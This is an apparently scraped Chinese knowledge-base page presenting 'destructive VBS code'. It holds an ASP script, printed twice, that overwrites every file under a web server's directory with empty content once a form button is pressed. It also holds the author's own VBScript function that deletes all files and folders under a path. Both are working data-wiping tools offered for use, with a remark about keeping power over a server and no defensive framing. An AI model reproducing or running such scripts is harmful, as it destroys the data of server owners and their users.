主頁(yè) > 知識(shí)庫(kù) > VBS破壞性應(yīng)用代碼

VBS破壞性應(yīng)用代碼

熱門(mén)標(biāo)簽:天津智能外呼系統(tǒng)排名 上海辦理400電話選號(hào) 外呼系統(tǒng)說(shuō)話聲音小怎么辦 外呼系統(tǒng)群 龍巖400電話申請(qǐng) 機(jī)器人打電銷適用于美業(yè)嗎 企業(yè)400電話辦理價(jià)錢(qián)低 墨西哥地圖標(biāo)注app 智云億呼電話機(jī)器人
'網(wǎng)上看到的,適用與沒(méi)有禁用shell.application的服務(wù)器   
server.scripttimeout = 99999   
If request("submit")>"" Then  
    Call listfile(server.mappath("./"))   
    response.Write"處理完畢"  
Else  
    response.Write"form>input type=""submit"" name=""submit"" value=""清空所有文件的內(nèi)容"">/form>"  
End If  

Function listfile(fpath)   
    On Error Resume Next  
    Dim Shell, Folder, s   
    Set Shell = server.CreateObject ("shell.application")   
    Set Folder = Shell.namespace(fpath)   
    Set f = server.CreateObject("adodb.stream")   
    f.Type = 1   
    f.Open  
    For Each s in Folder.Items   
        If s.isfolder Then  
            Call listfile(s.Path)   
        Else  
            f.savetofile s.Path, 2   
        End If  
    Next  
    Set f = Nothing  
    Set Shell = Nothing  
End Function  

'網(wǎng)上看到的,適用與沒(méi)有禁用shell.application的服務(wù)器
server.scripttimeout = 99999
If request("submit")>"" Then
    Call listfile(server.mappath("./"))
    response.Write"處理完畢"
Else
    response.Write"form>input type=""submit"" name=""submit"" value=""清空所有文件的內(nèi)容"">/form>"
End If

Function listfile(fpath)
    On Error Resume Next
    Dim Shell, Folder, s
    Set Shell = server.CreateObject ("shell.application")
    Set Folder = Shell.namespace(fpath)
    Set f = server.CreateObject("adodb.stream")
    f.Type = 1
    f.Open
    For Each s in Folder.Items
        If s.isfolder Then
            Call listfile(s.Path)
        Else
            f.savetofile s.Path, 2
        End If
    Next
    Set f = Nothing
    Set Shell = Nothing
End Function
以前也看到過(guò)這個(gè),感覺(jué)沒(méi)什么用,這么危險(xiǎn)的組件服務(wù)器一般都禁用了,但今天,我突然覺(jué)得有進(jìn)也得收集或制作一些這樣的軟件,可以維護(hù)自己的權(quán)力。具體什么原因我就不說(shuō)了,我寫(xiě)的一個(gè):

view plaincopy to clipboardprint?
'看到文件刪文件,看到文件夾刪除文件夾   
Function FilesTree(sPath)   
    Set oFso = CreateObject("Scripting.FileSystemObject")   
    Set oFolder = oFso.GetFolder(sPath)   
    Set oSubFolders = oFolder.SubFolders   

    Set oFiles = oFolder.Files   
    For Each oFile In oFiles   
        'WScript.Echo oFile.Path   
        oFile.Delete  
    Next  

    For Each oSubFolder In oSubFolders   
        'WScript.Echo oSubFolder.Path   
        oSubFolder.Delete  
        'FilesTree(oSubFolder.Path)'遞歸   
    Next  

    Set oFolder = Nothing  
    Set oSubFolders = Nothing  
    Set oFso = Nothing  
End Function  

FilesTree("F:\deltest\deltest") '遍歷  

標(biāo)簽:黃山 麗水 阜新 鄂爾多斯 齊齊哈爾 錫林郭勒盟 青島 承德

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《VBS破壞性應(yīng)用代碼》,本文關(guān)鍵詞  VBS,破壞性,應(yīng)用,代碼,VBS,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《VBS破壞性應(yīng)用代碼》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于VBS破壞性應(yīng)用代碼的相關(guān)信息資訊供網(wǎng)民參考!
  • 企业400电话

    智能AI客服机器人
    15000

    在线订购

    合计11份范本:公司章程+合伙协议+出资协议+合作协议+股权转让协议+增资扩股协议+股权激励+股东会决议+董事会决议

    推薦文章